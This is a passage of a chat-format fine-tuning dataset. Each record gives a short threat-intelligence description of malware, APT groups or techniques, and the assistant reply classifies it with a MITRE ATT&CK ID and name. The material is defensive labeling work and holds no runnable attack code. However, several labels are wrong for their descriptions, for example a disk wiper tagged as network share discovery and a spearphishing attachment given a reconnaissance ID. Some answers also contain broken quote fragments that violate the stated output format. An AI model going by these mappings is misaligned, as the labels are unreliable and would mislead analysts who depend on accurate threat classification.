- },
- {
- "role": "user",
- "content": "TYPEFRAME can execute commands using a shell."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Collect document files with the suffixes \".txt\", \".doc\" and \".xls\" in the Internet cache directory of the IE browser"
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gorgon Group attempted to get users to launch malicious Microsoft Office attachments delivered via spearphishing emails."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT37 has used Ruby scripts to execute payloads."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 used the WMIEXEC utility to execute \"whoami\" commands on remote machines."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some data in Remsec is encrypted using RC5 in CBC mode, AES-CBC with a hardcoded key, RC4, or Salsa20. Some data is also base64-encoded."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Unknown Logger has functionality to disable security tools, including Kaspersky, BitDefender, and MalwareBytes."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remcos has full control of the Registry, including the ability to modify it."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Additionally, Microsoft warned that this vulnerability could be used in the crafting of a wormable exploit. The Common Vulnerabilities and Exposures (CVE) site references this vulnerability as CVE-2008-4250"
- },
- {
- "role": "assistant",
- "content": "T1210 - Exploitation of Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GOLD CABIN uses malicious documents, often contained in password-protected archives, delivered through email to download and execute payloads. The second-stage payloads are most frequently Gozi ISFB (Ursnif) or IcedID (Bokbot), sometimes using intermediary malware like Valak. GOLD CABIN infrastructure relies on artificial appearing and frequently changing URLs created with a domain generation algorithm (DGA). The URLs host a PHP object that returns the malware as a DLL file.ToolsTaegis™ XDR Adversary Software Coverage Tool"
- },
- {
- "role": "assistant",
- "content": "T1568.002 - Domain Generation Algorithms"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Service providers have significant access to customer networks, enabling an attacker who had compromised a service provider to move laterally into the network of the service provider’s customer"
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service', 'T1021 - Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used Flash Player (CVE-2016-4117, CVE-2018-4878) and Word (CVE-2017-0199) exploits for execution."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remexi utilizes Run Registry keys in the HKLM hive as a persistence mechanism."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FoggyWeb has used a dynamic XOR key and custom XOR methodology for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CookieMiner has used the \"curl --upload-file\" command to exfiltrate data over HTTP."
- },
- {
- "role": "assistant",
- "content": "T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "was distributed through torrent file-sharing websites to South Korean victims, using a YouTube video downloader application as a lure."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If the size is 7 bytes or more, the backdoor verifies that the command and control server sent an encoded package"
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Droppers used by use RC4 or a 16-byte XOR key consisting of the bytes 0xA0 – 0xAF to obfuscate payloads."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses RDP to tunnel traffic from a victim environment."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ShimRatReporter sent generated reports to the C2 via HTTP POST requests."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This module has been described before in the article here. The first instructions in the main function hide the console window from the user. Afterward, the module will delete old \"sft\" files assuming they were already exfiltrated. After a pause of 6,500 milliseconds, it will start its search for the targeted files"
- },
- {
- "role": "assistant",
- "content": "T1564.003 - Hide Artifacts: Hidden Window"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT34 has used base64-encoded files that are dropped to victims."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pupy can use an add on feature when creating payloads that allows you to create custom Python scripts (“scriptlets”) to perform tasks offline (without requiring a session) such as sandbox detection, adding persistence, etc."
- },
- {
- "role": "assistant",
- "content": "T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the ability to download files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can gather the IP address from the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Exaramel for Linux has a command to execute a shell command on the system."
- },
- {
- "role": "assistant",
- "content": "T1059.004 - Command and Scripting Interpreter: Bash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can establish persistence through the system screensaver by configuring it to execute the malware."
- },
- {
- "role": "assistant",
- "content": "T1546.002 - Event Triggered Execution: Screensaver"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The \"net use \\\\system\\share /delete\" command can be used in Net to remove an established connection to a network share."
- },
- {
- "role": "assistant",
- "content": "T1070.005 - Indicator Removal on Host: Network Share Connection Removal"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates processes using the Windows API calls: CreateProcessA() and CreateProcessAsUserA()."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Crimson can spread across systems by infecting removable media."
- },
- {
- "role": "assistant",
- "content": "T1091 - Replication Through Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses WMI to perform discovery techniques."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IronNetInjector can identify processes via C# methods such as \"GetProcessesByName\" and running Tasklist with the Python \"os.popen\" function."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After deobfuscation you can see “Imminent Monitor” string which may indicate it is related to Imminent Monitor RAT"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion', 'T1123 - Audio Capture', 'T1125 - Video Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WarzoneRAT has the ability to inject malicious DLLs into a specific process for privilege escalation."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This campaign began with a handful of spear phishing emails to South Korean targets and containing malicious attachments"
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ferocious can use PowerShell scripts for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rocke used shell scripts to run commands which would obtain persistence and execute the cryptocurrency mining malware."
- },
- {
- "role": "assistant",
- "content": "T1059.004 - Command and Scripting Interpreter: Bash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Use automated methods, such as scripts, for collecting data (Automated Collection [T1119]) - Capture user input to obtain credentials and collect information (Input Capture [T1056]) - Collect local systems data from a compromised system (Data from Local System [T1005]) - Take screen captures of the desktop (Screen Capture [T1113]) - Collect data stored in the Windows clipboard from users (Clipboard Data [T1115"
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It then allocates a buffer with PAGE_EXECUTE_READWRITE protection to store the decrypted code. After the buffers are allocated, the packer checks if a string argument, which will be used as a decryption key, was passed to the AddByGod function. Next, the packer uses the AES256 algorithm with a SHA1 derived key of the passed argument to decrypt the encrypted code. If the decryption is successful, the decrypted code is executed and a second stage payload runs. Luckily, we managed to obtain the password that was needed to execute the binary and decrypt the encrypted payload"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MURKYTOP has the capability to retrieve information about groups."
- },
- {
- "role": "assistant",
- "content": "T1069 - Permission Groups Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To inject the OpenSSH server configuration directly into memory, Ebury parses the sshd binary’s code section mapped in the same process looking for two different functions. If it fails, it downgrades security features by disabling SELinux Role-Based Access Control and deactivating PAM modules. When one of the functions is successfully resolved, Ebury will use this when the backdoor is used to tamper with sshd‘s configuration"
- },
- {
- "role": "assistant",
- "content": "T1556.003 - Modify Authentication Process: Pluggable Authentication Modules', 'T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PipeMon installer can use UAC bypass techniques to install the payload."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole is capable of scanning enabled wireless networks on the compromised system. It records information such as the SSID and MAC address of the visible Wi-Fi access points"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tropic Trooper has tested if the localhost network is available and other connection capability on an infected system using command scripts."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It also creates a unique system specific identifier that it will use during the C2 communications to send and receive messages. The system specific identifier is a 16 character string that the Trojan creates using the serial number of the C volume and the first 4 hexadecimal bytes from Environment.UserName"
- },
- {
- "role": "assistant",
- "content": "T1071.003 - Mail Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 deployed the open source tool Responder to conduct NetBIOS Name Service poisoning, which captured usernames and hashed passwords that allowed access to legitimate credentials. APT28 close-access teams have used Wi-Fi pineapples to intercept Wi-Fi signals and user credentials."
- },
- {
- "role": "assistant",
- "content": "T1040 - Network Sniffing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "removes logs from /var/logs and /Library/logs."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN4 has used VBA macros to display a dialog box and collect victim credentials."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dacls can download its payload from a C2 server."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bisonal has used the MPRESS packer and similar tools for obfuscation."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HotCroissant has the ability to do real time screen viewing on an infected host."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XCSSET loads a system level launchdaemon using the \"launchctl load -w\" command from \"/System/Librarby/LaunchDaemons/ssh.plist\"."
- },
- {
- "role": "assistant",
- "content": "T1569.001 - System Services: Launchctl"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LazyScripter has used PowerShell scripts to execute malicious code."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Green Lambert can add \"init.d\" and \"rc.d\" files in the \"/etc\" folder to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1037.004 - Boot or Logon Initialization Scripts: Rc.common"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Process hollowing is a code injection technique that involves spawning a new instance of legitimate process (in this case c:\\windows\\syswow64\\explorer.exe) and then replacing the legitimate code with malware"
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Windigo has delivered a generic Windows proxy Win32/Glubteta.M. Windigo has also used multiple reverse proxy chains as part of their C2 infrastructure."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 has used search order hijacking to execute malicious payloads, such as Winnti RAT."
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SPACESHIP identifies files with certain extensions and copies them to a directory in the user's profile."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "adds a new service named NetAdapter to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Command and control To traverse the firewall, C2 traffic for most TG-3390 tools occurs over ports 53, 80, and 443"
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port', 'T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky is a highly motivated APT that has traditionally targeted entities in South Korea. The APT group has used a variety of malware such as Gold Dragon, Babyshark and Appleseed to target entities ranging from defense to education and think tanks. Some file enumerators will exfiltrate all files with specific extensions. What's interesting here, however, is that the attackers knew exactly which files they were looking for"
- },
- {
- "role": "assistant",
- "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Nltest may be used to enumerate remote domain controllers using options such as \"/dclist\" and \"/dsgetdc\"."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a command to create a reverse shell."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GOLD SOUTHFIELD has breached Managed Service Providers (MSP's) to deliver malware to MSP customers."
- },
- {
- "role": "assistant",
- "content": "T1199 - Trusted Relationship"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The HyperShell and HighShell webshells are variants of what we track as TwoFace, with HyperShell being related to the TwoFace loader and HighShell being related to the TwoFace payload, as we reported in July 2017"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It can reflectively load a DLL/EXE in to the PowerShell process, or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints, please lead the Notes section (GENERAL NOTES) for information on how to use them."
- },
- {
- "role": "assistant",
- "content": "T1620 - Reflective Code Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA551 has distributed different families of malware, including Ursnif (Gozi/ISFB), Valak and IcedID. TA551 malspam spoofs legitimate email chains based on data retrieved from previously infected Windows hosts. This is a generic statement asking the recipient to open an attached ZIP archive using the supplied password. For example, if the spoofed sender is someone@companyname.com, the ZIP attachment would be named companyname.zip. In 2020, we also started seeing emails with info.zip or request.zip as the attached ZIP archive names. These password-protected ZIP attachments contain a Word document with macros to install malware. File names for the extracted Word documents follow noticeable patterns that have evolved as this campaign has progressed. URLs generated by the associated Word macros also follow noticeable patterns that have also evolved as this campaign has progressed"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Office365DCOMCheck or SystemDiskClean) as the name for the scheduled task to maintain persistence on the victim host"
- },
- {
- "role": "assistant",
- "content": "T1053 - Scheduled Task/Job', 'T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wiping all available methods of recovery shows this attacker had no intention of leaving the machine useable. The purpose of this malware is to perform destruction of the host, leave the computer system offline, and wipe remote data. Additionally, the destroyer disables all the services on the system: The malware uses the ChangeServiceConfigW API to change the start type to 4 which means: \"Disabled: Specifies that the service should not be started"
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Crutch has automatically exfiltrated stolen files to Dropbox."
- },
- {
- "role": "assistant",
- "content": "T1020 - Automated Exfiltration"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "exfiltrates data in compressed chunks if a message is larger than 4096 bytes ."
- },
- {
- "role": "assistant",
- "content": "T1030 - Data Transfer Size Limits"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Night Dragon has disabled anti-virus and anti-spyware tools in some instances on the victim’s machines. The actors have also disabled proxy settings to allow direct communication from victims to the Internet."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
